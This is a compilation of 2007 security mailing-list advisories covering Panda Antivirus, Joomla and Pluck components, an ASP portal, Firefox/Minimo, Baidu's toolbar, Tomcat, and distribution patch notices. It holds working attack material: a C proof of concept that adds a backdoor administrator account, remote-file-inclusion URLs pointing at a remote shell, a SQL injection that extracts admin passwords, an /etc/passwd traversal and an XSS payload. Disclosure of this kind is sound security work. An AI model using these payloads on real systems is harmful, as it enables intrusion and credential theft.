Panda Antivirus 2008 Local Privileg Escalation (UPS they did it again)
_
Security Advisory
_
_
Severity: Medium
Title: Panda Antivirus 2008 Local Privileg Escalation
Date: 02.08.07
Author: tarkus (tarkus (at) tiifp (dot) org)
URL: https://tiifp.org/tarkus
Vendor: Panda (http://www.pandasoftware.com/)
Affected Products: Panda Antivirus 2008
Not Affected Products: - Panda Internetsecurity 2008
- Panda Antivirus + Firewall 2008
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Description:
1. During installation of Panda Antivirus 2008 the permissions for
installation folder %ProgramFiles%\Panda Security\Panda Antivirus 2008\
by default are set to Everyone:Full Control. Few services
(e.g. PAVSRV51.EXE) are started from this folder. Services are started
under LocalSystem account. There is no protection of service files. It's
possible for unprivileged user to replace service executable with the
file of his choice to get full access with LocalSystem privileges. Or to
get privileges or any user (including system administrator) who logons
to vulnerable host. This can be exploited by:
a. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder
b. Copy any application to PAVSRV51.exe
c. Reboot
Upon reboot trojaned application will be executed with LocalSystem
account.
BTW: Check this from last year (http://www.securityfocus.com/bid/19891)
POC:
#include
#include
INT main( VOID )
{
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add",
szWinDir );
system( szCmdLine );
printf( "Adding user \"owner\" to the local Administrators group...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner
/add", szWinDir );
system( szCmdLine );
return 0;
}
Vendor Response:
[...]
Thank you very much for having reported us this piece of information.
This feedback will allow us to keep improving our products and to
prepare new releases that will fit your actual needs and helps us to
create a better product.
[...]
Disclosure Timeline:
2007.06.07 - Vulnerability found
2007.06.07 - Reported to Vendor (Until Beta)
2007.07.31 - Released by vender
2007.08.02 - Public Disclosure
[Whitepaper SecNiche] Insecurities in Implementing Serialization in BISON
hi A specific white paper have been released comprising of specific application problems related to Bison. You can look into it. http://www.secniche.org/papers/Ser_Insec_Bison.pdf Regards AKS http://www.secniche.org
our de France Pool 1.0.1 Remote File İnclude Bug
Yollubunlar.Org Title : Tour de France Pool 1.0.1 Remote File İnclude Bug Author : Yollubunlar.Org Orginal : http://yollubunlar.org/our-de-france-pool-101-remote-file-include-43.html Mail: [EMAIL PROTECTED] Down: http://joomla.bultena.com/component/option,com_remository/Itemid,26/func,download/id,19/chk,f9f89538d34c214c01bfc48dc276e762/lang,en/ Bug : in admin.tour_toto.php " require_once( $mosConfig_absolute_path.'/administrator/components/com_tour_toto/riders.php'); " Exploit : site.com/path/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=sHELL? Greetz: Yollubunlar.Org Not: Vatan Sagolsun ! Şehitler Ölmez , Vatan Bölünmez "
Hunkaray Okul Portali v1.1 (tr) Sql injection Vuln
///Yollubunlar.Org/// Title: Hunkaray Okul Portali v1.1 (tr) Sql injection Vuln Author : Yollubunlar Orginal: http://yollubunlar.org/hunkaray-okul-portali-v11-tr-sql-injection-vuln-44.html Web Page :www.yollubunlar.orgg Contact : [EMAIL PROTECTED] Acik : in duyuruoku.asp http://site.com/script_path/duyuruoku.asp?id=1+union+select+0,1,sifre,3+from+admin Note : Vatan Bolunmez Sehitler Olmez ! ///Yollubunlar.Org///
Minimo .2 and more Firefox 2.0.0.6 Password Manager Vulnerabilites
Airscanner Mobile Security Advisory #07080102: Minimo <=.2 and Firefox 2.0.0.6 Product: Minimo <=.2 and Firefox 2.0.0.6 http://airscanner.com/security/07080103_minimo.2.htm Platform: Tested on Minimo .016 and .2 Windows Mobile Pocket PC 2005 and Firefox 2.0.0.6 Windows XP SP2 Requirements: Mobile device running Windows Mobile Pocket PC or Firefox 2.0.0.6 on XP Credits: Seth Fogie Airscanner Mobile Security http://www.airscanner.com 01/10/2007 for Minimo .016 and 07/22/2007 for Minimo .2 (Windows Mobile) and 08/02/2007 for Firefox 2.0.0.6 Risk Level: High - Disclosure of sensitive information Program Summary: From the website: http://www.mozilla.org/projects/minimo/ Minimo uses Mozilla Technologies to produce a highly usable web browser for advanced mobile devices. Features include: * Fast access to your mobile content via Homebase start page * Best support for modern web standards (Javascript and AJAX). * Social Bookmarking * Tab browsing * RSS Support * Proven security (TLS, SSL3) * International support * Cross platform capability * Widget and Extension support Vulnerability Details: Minimo includes a password manager feature that allows users to store user/password information of sites they visit. There are two ways this feature can be abused. First, the action of any form can be changed dynamically via JavaScript, which could be introduced into a site via a cross-site scripting (XSS)bug. Second, the form fields can be automatically filled in without user interaction. As a result, a XSS bug could allow an attacker to inject an invisible form into a victims browser that could collect the user/pass without any interaction or visible indication. Note: The Password Manager bug is often misunderstood for how it work. The reason is that there are numerous subtle variations on how the username and password show up. The following highlights some of these: 1. If there is only one username stored in the password manager for the specific, it will automatically show up in the username field. If there is more than one username stored in the Password Manager, a user would normally type in or select the specific username for the site, which then allows Minimo/Firefox to fill in the password. As a result, an attacker would have to know the username to successfully grab the credentials. 2. If the password field is named 'password' and there is only one username associated with the site, the Password Manager will automatically fill in both the user and password. This particular version was noticed by http://www.heise-security.co.uk/services/browsercheck/demos/moz/pass1.shtml. Similar Firefox bugs has been known about since mid-2006; however, https://bugzilla.mozilla.org/show_bug.cgi?id=360493#c44 indicates these are supposedly resolved. The details and vulnerable status of Minimo .2 and below is new. Proof of Concept The following webpage provides a link to two pages. The login.php page is just a sample form that you can enter a user/pass into. Enter and save some sample info and then click on the second poc.htm link. This will open a page with a script inside that dynamically creates a framed environment, one of which is essentially hidden (note: using style:hidden will not work). In the hidden frame, the login.php page is loaded, the action is changed, and the user/pass are tickled into the form fields. You should see two popups - one with the changed form action, and the other with the stored user & pass variables. http://www.airscanner.com/tests/minimo.htm Workaround: Don't use password manager. Vendor Response: Awaiting Response. Copyright (c) 2007 Airscanner Corp. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of Airscanner Corp. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please contact Airscanner Corp. for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use on an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
RE: Re: Guidance Software response to iSEC report on EnCase
iSEC last night released our report on issues discovered in The Sleuth Kit and Guidance Software's EnCase Forensic and Enterprise Editions: http://www.isecpartners.com/files/iSEC-Breaking_Forensics_Software-Paper .v1_1.BH2007.pdf We will send out these bugs in "advisory" format soon. It should be noted that these issues were addressed in version 2.09 of The Sleuth Kit, and most of the EnCase issues (not including our concerns with EnCase Enterprise's cryptographic system) will be mitigated in the upcoming version 6.7 release. Also of interest to those in the forensics community may be this analysis of the impact security flaws can have on the use of computer forensic evidence in civil and criminal proceedings prepared by Chris Ridder of the Stanford Law School Center for Internet and Society. Although we are happy to host his paper, this work is the output of Mr. Ridder and is not officially a publication of iSEC Partners: http://www.isecpartners.com/files/Ridder-Evidentiary_Implications_of_Sec urity_Weaknesses_in_Forensic_Software.pdf I would like to thank Tim Newsham, Chris Palmer, and Jesse Burns for finding these issues. Thank you, Alex
rPSA-2007-0153-1 qt-x11-free
rPath Security Advisory: 2007-0153-1 Published: 2007-08-01 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: qt-x11-free=/[EMAIL PROTECTED]:devel//1/3.3.4-5.9-1 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3388 https://issues.rpath.com/browse/RPL-1597 Description: Previous versions of the qt-11-free package are vulnerable to user-assisted format-string attacks, possibly leading to arbitrary code execution in applications that use the QTextEdit widget. Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
Baidu Soba Remote Code Execute Vulnerability(FGA-2007-10)
hi full-disclosure,
Baidu Soba Remote Code Execute Vulnerability
by cocoruder of Fortinet Security Research Team
http://ruder.cdut.net
Summary:
Baidu Soba is a popular browser toolbar which developed by Baidu, a Chinese
web search engine company, like Google, more informations can be found at:
http://www.baidu.com
http://bar.baidu.com/sobar/promotion.html
There exists a remote code execute vulnerability in Baidu Soba's ActiveX
Control "BaiduBar.dll". A remote attacker who successfully exploit these
vulnerabilities can completely take control of the affected system.
Affected Software Versions:
Baidu Soba 5.4(Version of "BaiduBar.dll" is 2.0.2.144)
Details:
This vulnerability exist in the function "DloadDS()" educed by
"BaiduBar.dll", following are some related imformations:
InprocServer32: C:\Program Files\baidu\bar\BaiduBar.dll
ClassID : A7F05EE4-0426-454F-8013-C41E3596E9E9
[id(0x001d), helpstring("method DloadDS")]
void DloadDS(
[in] BSTR bstrUrl,
[in] BSTR bstrName,
[in] long lShow);
When we set the parameter "bstrUrl" as a CAB file which can be download via
"http" protocol, "DloadDS()" will try to download this file to Windows Internet
Explorer temporary directory and try to execute the file named as parameter
"bstrName", the key code as follows:
.text:1006F407 lea eax, [ebp-28h]
.text:1006F40A lea ecx, [ebp-10h]
.text:1006F40D pusheax ;
lpProcessInformation
.text:1006F40E lea eax, [ebp-6Ch]
.text:1006F411 pusheax ;
lpStartupInfo
.text:1006F412 pushesi ;
lpCurrentDirectory
.text:1006F413 pushesi ;
lpEnvironment
.text:1006F414 pushesi ;
dwCreationFlags
.text:1006F415 pushesi ;
bInheritHandles
.text:1006F416 pushesi ;
lpThreadAttributes
.text:1006F417 pushesi ;
lpProcessAttributes
.text:1006F418 pushesi
.text:1006F419 callsub_10004147 ; get
the CommandLine
.text:1006F419
.text:1006F41E pusheax ;
lpCommandLine
.text:1006F41F pushesi ;
lpApplicationName
.text:1006F420 callds:CreateProcessA
As we seen, lpCommandLine point to
"C:\DOCUME~1\administrator\LOCALS~1\Temp\calc.exe",Because there is no valid
checks, the attacker can build a CAB file which included a trojan or spy
program and use the function "DloadDS()" for executing it.
Attached File:
Exploit can be found at the following url, please do not use for attacking.
http://ruder.cdut.net/attach/baidu_soba/baidu_soba_exploit.html
Solution:
Baidu said they have fixed this fault, but infact, the product downloaded
from "http://bar.baidu.com/sobar/promotion.html"; is also affected, we strongly
suggest user set a Killbit for this CLSID.
Disclosure Timeline:
2007.07.19 Vendor notified via email
2007.07.19 Vendor responded
2007.07.23 Vendor noticed me new version is available and they
refuse to release an advisory for this vul
2007.07.24 Vendor say they have not updated the product
successfully
2007.08.01 Vendor noticed me again that new version is available
2007.08.02 But it looks like they are failed too
2007.08.02 Advisory released
Disclaimer:
Although Fortinet has attempted to provide accurate information in
these materials, Fortinet assumes no legal responsibility for the
accuracy or completeness of the information. More specific information
is available on request from Fortinet. Please note that Fortinet's
product information does not constitute or contain any guarantee,
warranty or legally binding representation, unless expressly
identified as such in a duly signed writing.
Fortinet Security Research
[EMAIL PROTECTED]
http://www.fortinet.com
Best Regards,
cocoruder of Fortinet Security Research Team
[EMAIL PROTECTED]
2007-08-02
*** Disclaimer: This message may contain privileged and/or confidential
information. If you have received this e-mail in error or are not the intended
recipient, you may not use, copy, disseminate or distribute it; do not open any
attachments, delete it immediately from your system and notify the sender
promptly by e-mail that you have done so. Thank you. ***
CVE-2007-3384: XSS in Tomcat cookies example
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
CVE-2007-3384: XSS in Tomcat cookies example
Severity:
Low (Cross-site scripting)
Vendor:
The Apache Software Foundation
Versions Affected:
3.3 to 3.3.2
Description:
When reporting error messages, Tomcat does not filter user supplied
data before display. This enables an XSS attack.
Mitigation:
Remove examples web application.
Apply patch available from http://tomcat.apache.org/download-33.cgi
Credit:
This issue was discovered by Tomasz Kuczynski, Poznan Supercomputing
and Networking Center, who worked with the CERT/CC to report the
vulnerability.
Example:
http://localhost:8080/examples/servlet/CookieExample
populate Name or Value field with:
alert('XSS reflected');
and submit.
References:
http://tomcat.apache.org/security.html
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFGsU0Vb7IeiTPGAkMRAoiwAJ4iETiZnDPLKM0v69YZ/FaIhGS8GwCgt+ux
FB0O3FigwHs+A8pP98+gRiA=
=VePF
-END PGP SIGNATURE-
[ MDKSA-2007:151 ] - Updated qt3 packages fix multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:151 http://www.mandriva.com/security/ ___ Package : qt3 Date: August 1, 2007 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0 ___ Problem Description: A number of format string flaws have been discovered in how Qt handled error messages by Dirk Mueller and Tracey Parry of Portcullis Computer Security. If an application linked against Qt created an error message from user-supplied data in a certain way, it could possibly lead to the execution of arbitrary code or a denial of service. This update provides packages which are patched to prevent these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3388 ___ Updated Packages: Mandriva Linux 2007.0: ce0be0c7f6a6e866476fbfd2e21ae98c 2007.0/i586/libdesignercore1-3.3.6-18.3mdv2007.0.i586.rpm d1a44381c8f93f1b7c339f6984f7e89f 2007.0/i586/libeditor1-3.3.6-18.3mdv2007.0.i586.rpm 7b5d2c3dade2761d2cfda191b9b64007 2007.0/i586/libqassistantclient1-3.3.6-18.3mdv2007.0.i586.rpm ef5c47cca08d8c61f49cc8f5079c9530 2007.0/i586/libqt3-3.3.6-18.3mdv2007.0.i586.rpm 1351e443eb632ae1353361960674df09 2007.0/i586/libqt3-devel-3.3.6-18.3mdv2007.0.i586.rpm cdb6e25c831c6a80621fd1e2786a706a 2007.0/i586/libqt3-mysql-3.3.6-18.3mdv2007.0.i586.rpm a4a03c9d3b4fb5b8bf7bbb698085b8f9 2007.0/i586/libqt3-odbc-3.3.6-18.3mdv2007.0.i586.rpm 7853e420094557482fb5258e14c8caa3 2007.0/i586/libqt3-psql-3.3.6-18.3mdv2007.0.i586.rpm 9260fc52f792e4eb3ae17edeeedad3f9 2007.0/i586/libqt3-sqlite-3.3.6-18.3mdv2007.0.i586.rpm ad12f0dc6c5b6007c0fa326b2d853930 2007.0/i586/libqt3-static-devel-3.3.6-18.3mdv2007.0.i586.rpm c109e982693cb1698287a80c493b3961 2007.0/i586/qt3-common-3.3.6-18.3mdv2007.0.i586.rpm cfad56aa1c0ee5fd67d1e6c8090d1b6d 2007.0/i586/qt3-doc-3.3.6-18.3mdv2007.0.i586.rpm 0eccadc116d3918e43eb74600d60ad4f 2007.0/i586/qt3-example-3.3.6-18.3mdv2007.0.i586.rpm 2499a2bf3f69f77a4942a18068331ec4 2007.0/i586/qt3-tutorial-3.3.6-18.3mdv2007.0.i586.rpm 91aad72a3e393be4f71eacc89a304a4b 2007.0/SRPMS/qt3-3.3.6-18.3mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 457642358c8514efdf92558fc047edef 2007.0/x86_64/lib64designercore1-3.3.6-18.3mdv2007.0.x86_64.rpm 1f6eeb9a0669e741ab3a5990edf25cc6 2007.0/x86_64/lib64editor1-3.3.6-18.3mdv2007.0.x86_64.rpm 5e29145fdca5ab04e94f3c205a8703d0 2007.0/x86_64/lib64qassistantclient1-3.3.6-18.3mdv2007.0.x86_64.rpm 3e0231d5db209fbc5d991ba52c1b915a 2007.0/x86_64/lib64qt3-3.3.6-18.3mdv2007.0.x86_64.rpm 2fd65d9bf31ccacd31c28d30a1a4f107 2007.0/x86_64/lib64qt3-devel-3.3.6-18.3mdv2007.0.x86_64.rpm aa14be509decd6fa57b367b97eb60adc 2007.0/x86_64/lib64qt3-mysql-3.3.6-18.3mdv2007.0.x86_64.rpm e6ee67759c5781ed5968c9684fd812f4 2007.0/x86_64/lib64qt3-odbc-3.3.6-18.3mdv2007.0.x86_64.rpm 7a4c368159c8ffaeb1af1b84740afaf5 2007.0/x86_64/lib64qt3-psql-3.3.6-18.3mdv2007.0.x86_64.rpm 06d81033389e0295233b5798b5cdd8cb 2007.0/x86_64/lib64qt3-sqlite-3.3.6-18.3mdv2007.0.x86_64.rpm 18ce8b51725aaf658fe01f5e4ae8ac4f 2007.0/x86_64/lib64qt3-static-devel-3.3.6-18.3mdv2007.0.x86_64.rpm 6df81bd244102ae58fb02fe82959dacc 2007.0/x86_64/qt3-common-3.3.6-18.3mdv2007.0.x86_64.rpm 640ffac5c35d861992d78c35588d307c 2007.0/x86_64/qt3-doc-3.3.6-18.3mdv2007.0.x86_64.rpm 381fe2a406bde1148e70f806eec93dc6 2007.0/x86_64/qt3-example-3.3.6-18.3mdv2007.0.x86_64.rpm a9cc3c67b4567a291c92289287d72109 2007.0/x86_64/qt3-tutorial-3.3.6-18.3mdv2007.0.x86_64.rpm 91aad72a3e393be4f71eacc89a304a4b 2007.0/SRPMS/qt3-3.3.6-18.3mdv2007.0.src.rpm Mandriva Linux 2007.1: f231e74f4430c2af2d98ceea4d8a10d6 2007.1/i586/libdesignercore1-3.3.8-4.1mdv2007.1.i586.rpm a4ef440b08c6bdd01c623d45ef8bab58 2007.1/i586/libeditor1-3.3.8-4.1mdv2007.1.i586.rpm eaa9762ebeef32cac2c05e98322e7ac4 2007.1/i586/libqassistantclient1-3.3.8-4.1mdv2007.1.i586.rpm 1daa2c536a539407c5d223365402609f 2007.1/i586/libqt3-3.3.8-4.1mdv2007.1.i586.rpm a9e19c1bba726c8bfe292f794c037857 2007.1/i586/libqt3-devel-3.3.8-4.1mdv2007.1.i586.rpm 1a8907d6fd1b748bed29e14d968296fb 2007.1/i586/libqt3-mysql-3.3.8-4.1mdv2007.1.i586.rpm a8cd79d1d0da5dd44720c37c305fd38d 2007.1/i586/libqt3-odbc-3.3.8-4.1mdv2007.1.i586.rpm 3728a43c435707c1cddc5d36da39ec40 2007.1/i586/libqt3-psql-3.3.8-4.1mdv2007.1.i586.rpm 7d6804a498f307e21a3c16de14733451 2007.1/i586/libqt3-sqlite-3.3.8-4.1mdv2007.1.i586.rpm 3c60a4e503adec67a80ad3b85a94f28c 2007.1/i586/libqt3-static-devel-3.3.8-4.1mdv2007.1.i586.rpm b0cbefd80eb6ad6491455b5890fbd15d 2007.1/i586/qt3-common-3.3.8-4.1mdv2007.1.i586.rpm
[USN-494-1] Gimp vulnerability
=== Ubuntu Security Notice USN-494-1August 02, 2007 gimp vulnerability CVE-2006-4519 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: gimp 2.2.11-1ubuntu3.4 Ubuntu 6.10: gimp 2.2.13-1ubuntu3.3 Ubuntu 7.04: gimp 2.2.13-1ubuntu4.3 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Sean Larsson discovered multiple integer overflows in Gimp. By tricking a user into opening a specially crafted DICOM, PNM, PSD, PSP, RAS, XBM, or XWD image, a remote attacker could exploit this to execute arbitrary code with the user's privileges. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gimp/gimp_2.2.11-1ubuntu3.4.diff.gz Size/MD5:40714 e96cfd660a58bc8288c988b969157d6b http://security.ubuntu.com/ubuntu/pool/main/g/gimp/gimp_2.2.11-1ubuntu3.4.dsc Size/MD5: 1264 d450d6ab08bf1c072d311ba71072791f http://security.ubuntu.com/ubuntu/pool/main/g/gimp/gimp_2.2.11.orig.tar.gz Size/MD5: 18549092 c4312189e3a7f869a26874854dc6a1d7 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/g/gimp/gimp-data_2.2.11-1ubuntu3.4_all.deb Size/MD5: 2093694 d16fb4c13ac33029dff5dc32e8e552d4 http://security.ubuntu.com/ubuntu/pool/main/g/gimp/libgimp2.0-doc_2.2.11-1ubuntu3.4_all.deb Size/MD5: 527776 d895ca836319b95386904d8efda512a9 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/g/gimp/gimp-dbg_2.2.11-1ubuntu3.4_amd64.deb Size/MD5: 8475322 63ec56235fad14ab72ab96679b944f05 http://security.ubuntu.com/ubuntu/pool/main/g/gimp/gimp-helpbrowser_2.2.11-1ubuntu3.4_amd64.deb Size/MD5:53378 fc4a117ee1bc83bd27eb56297a6fa0dd http://security.ubuntu.com/ubuntu/pool/main/g/gimp/gimp-python_2.2.11-1ubuntu3.4_amd64.deb Size/MD5: 133776 e50ab7750e11e7e4c9e1919f3b484005 http://security.ubuntu.com/ubuntu/pool/universe/g/gimp/gimp-svg_2.2.11-1ubuntu3.4_amd64.deb Size/MD5:53436 efd05f053cf35f1049d53d6c0963047b http://security.ubuntu.com/ubuntu/pool/main/g/gimp/gimp_2.2.11-1ubuntu3.4_amd64.deb Size/MD5: 3149614 f4229dd88a78787d8e373bce18105215 http://security.ubuntu.com/ubuntu/pool/main/g/gimp/libgimp2.0-dev_2.2.11-1ubuntu3.4_amd64.deb Size/MD5: 108984 0b1336e1ac4e2211eac44fb4c129b1f2 http://security.ubuntu.com/ubuntu/pool/main/g/gimp/libgimp2.0_2.2.11-1ubuntu3.4_amd64.deb Size/MD5: 453724 aaafa0232a9a42c46bf1461dafd7b86d i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/g/gimp/gimp-dbg_2.2.11-1ubuntu3.4_i386.deb Size/MD5: 7197820 1b987d4594f0f45a0ac668e9640f632e http://security.ubuntu.com/ubuntu/pool/main/g/gimp/gimp-helpbrowser_2.2.11-1ubuntu3.4_i386.deb Size/MD5:52076 2a708b944d8e2aeaecdb756b676e8cb8 http://security.ubuntu.com/ubuntu/pool/main/g/gimp/gimp-python_2.2.11-1ubuntu3.4_i386.deb Size/MD5: 126150 73cd34003a262b96510a8af3b4b4aac3 http://security.ubuntu.com/ubuntu/pool/universe/g/gimp/gimp-svg_2.2.11-1ubuntu3.4_i386.deb Size/MD5:52504 897af1ccc8ae7d8755e8d4660f017af1 http://security.ubuntu.com/ubuntu/pool/main/g/gimp/gimp_2.2.11-1ubuntu3.4_i386.deb Size/MD5: 2779336 35c21e1c52949d6ce5c92b76ef38f7f1 http://security.ubuntu.com/ubuntu/pool/main/g/gimp/libgimp2.0-dev_2.2.11-1ubuntu3.4_i386.deb Size/MD5: 109000 20b2c8c342dd911a05d5e0a3873a2e68 http://security.ubuntu.com/ubuntu/pool/main/g/gimp/libgimp2.0_2.2.11-1ubuntu3.4_i386.deb Size/MD5: 410586 ca461595eae44fd4baee26785940b423 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/g/gimp/gimp-dbg_2.2.11-1ubuntu3.4_powerpc.deb Size/MD5: 8507148 ca9c4f366ce537ed55b720a89c029ea4 http://security.ubuntu.com/ubuntu/pool/main/g/gimp/gimp-helpbrowser_2.2.11-1ubuntu3.4_powerpc.deb Size/MD5:53842 94fccb99502f4997be925b12d63acf16 http://security.ubuntu.com/ubuntu/pool/main/g/gimp/gimp-python_2.2.11-1ubuntu3.4_powerpc.deb Size/MD5: 129688 fe89075ba197890ff94407c1cdbb04b1 http://security.ubuntu.com/ubuntu/pool/universe/g/gimp/gimp-svg_2.2.11-1ubuntu3.4_powerpc.deb Size/MD5:54504 1d1cb56601efa23820e4769e87b023bf http://security.ubuntu.com/ubuntu/pool/main/g/gimp/gimp_2.2.11-1ubuntu3.4_powerpc.deb Size/MD5: 3229686 d02a45ac4edb2f05a104b2c77f6c3223
Pluck 4.3 themes.php Remote File Inclusion and disclosure
__
Aria-Security Team
__
Pluck 4.3 Remote File Inclusion
Vendor: http://www.pluck-cms.org/
/path/data/inc/theme.php
if Register_global was set as ON then we can use the $dir variable for RFI
(is_file($dir."/".$file))
$files[]=$file;
else
$dirs[]=$dir."/".$file;
}
}
if($dirs) {
foreach ($dirs as $dir) {
include ("$dir/theme.php");
http://example.com/path/data/inc/theme.php?dir=http://site/shell.ext?
-
fputs($file, "");
if Register_global was set as ON then we can use the $file variable for
disclosure.
example:
http://example.com/path/data/inc/theme.php?file=../../../../etc/passwd (DEPENDS
on server)
Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info [PERSONAL BLOG]
[ MDKSA-2007:152 ] - Updated Firefox packages fix multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:152 http://www.mandriva.com/security/ ___ Package : mozilla-firefox Date: August 1, 2007 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0 ___ Problem Description: A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Firefox program, version 2.0.0.6. This update provides the latest Firefox to correct these issues. As well, it provides Firefox 2.0.0.6 for older products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3089 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3285 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3656 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3670 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3734 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3735 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3736 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3737 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3738 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3844 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3845 http://www.mozilla.org/security/announce/2007/mfsa2007-18.html http://www.mozilla.org/security/announce/2007/mfsa2007-19.html http://www.mozilla.org/security/announce/2007/mfsa2007-20.html http://www.mozilla.org/security/announce/2007/mfsa2007-21.html http://www.mozilla.org/security/announce/2007/mfsa2007-22.html http://www.mozilla.org/security/announce/2007/mfsa2007-23.html http://www.mozilla.org/security/announce/2007/mfsa2007-24.html http://www.mozilla.org/security/announce/2007/mfsa2007-25.html http://www.mozilla.org/security/announce/2007/mfsa2007-26.html http://www.mozilla.org/security/announce/2007/mfsa2007-27.html ___ Updated Packages: Mandriva Linux 2007.0: a3db4e0436fad36348d535c8b7918947 2007.0/i586/deskbar-applet-2.16.0-3.7mdv2007.0.i586.rpm 363344816deb836878a0f29b09813996 2007.0/i586/devhelp-0.12-5.7mdv2007.0.i586.rpm b1eee5ad88de38063f8caf46d6908b79 2007.0/i586/devhelp-plugins-0.12-5.7mdv2007.0.i586.rpm 8a489b11b539db8a3b8e2c7f294e47dd 2007.0/i586/epiphany-2.16.0-4.7mdv2007.0.i586.rpm 11b73569a756e343e89882dac4e1714e 2007.0/i586/epiphany-devel-2.16.0-4.7mdv2007.0.i586.rpm 0d53d5e5b4e3d3ec9303109c679ab02b 2007.0/i586/epiphany-extensions-2.16.0-3.7mdv2007.0.i586.rpm 48deac24c338aecb891bf836bc76e169 2007.0/i586/galeon-2.0.1-8.7mdv2007.0.i586.rpm 6a6a8c3842ca1cee342eb67cbe900636 2007.0/i586/gnome-python-extras-2.14.2-6.7mdv2007.0.i586.rpm 7210813ca609fabc38a95786eb5592c4 2007.0/i586/gnome-python-gdl-2.14.2-6.7mdv2007.0.i586.rpm 2a9c8a5264792d198d8bc472a81c4fcc 2007.0/i586/gnome-python-gksu-2.14.2-6.7mdv2007.0.i586.rpm 54c802c882877790eae2e0cf81ecc536 2007.0/i586/gnome-python-gtkhtml2-2.14.2-6.7mdv2007.0.i586.rpm 268b5bfe8b8d48357c9c87b985067268 2007.0/i586/gnome-python-gtkmozembed-2.14.2-6.7mdv2007.0.i586.rpm cf412b3fbd9191e164049ebec54dcb98 2007.0/i586/gnome-python-gtkspell-2.14.2-6.7mdv2007.0.i586.rpm ca6b63fd01725e9b23382cab605e221f 2007.0/i586/libdevhelp-1_0-0.12-5.7mdv2007.0.i586.rpm 9e5529fec033accf756be557c131ba13 2007.0/i586/libdevhelp-1_0-devel-0.12-5.7mdv2007.0.i586.rpm faca6904a4c3f3338a3049dba45b746a 2007.0/i586/libmozilla-firefox2.0.0.6-2.0.0.6-1mdv2007.0.i586.rpm e30d3ec3189f2052247be453fd4be287 2007.0/i586/libmozilla-firefox2.0.0.6-devel-2.0.0.6-1mdv2007.0.i586.rpm a04d17454862f7bec25cadfdb7172471 2007.0/i586/libnspr4-2.0.0.6-1mdv2007.0.i586.rpm f20189b561055c3998155e30d667d02b 2007.0/i586/libnspr4-devel-2.0.0.6-1mdv2007.0.i586.rpm 17699fa1fe5c2b7742d18d17f0da7288 2007.0/i586/libnspr4-static-devel-2.0.0.6-1mdv2007.0.i586.rpm 7ba1ff7924e73ccd324a398f325dc7d6 2007.0/i586/libnss3-2.0.0.6-1mdv2007.0.i586.rpm 0aa867c353690a0fe0b1479825d71a03 2007.0/i586/libnss3-devel-2.0.0.6-1mdv2007.0.i586.rpm bf83457a4869835124dcad348d73db37 2007.0/i586/libtotem-plparser1-2.16.1-2.7mdv2007.0.i586.rpm 955e5fd14950338a8b7c824258272c5c 2007.0/i586/libtotem-plparser1-devel-2.16.1-2.7mdv2007.0.i586.rpm f5f979a54d216019bbd5a4a213863a9b 2007.0/i586/mozilla-firefox-2.0.0.6-1mdv2007.0.i586.rpm cab25ecf6597c442052662bfedcbc114 2007.0/i586/mozilla-firefox-ar-2.0.0.6-1mdv2007.0.i586.rpm 9165d5ee5185bd84ffe9fabc640619f9 2007.0/i586/mozilla-firefox-bg-2.0.0.6-1mdv2007.0.i586.rpm 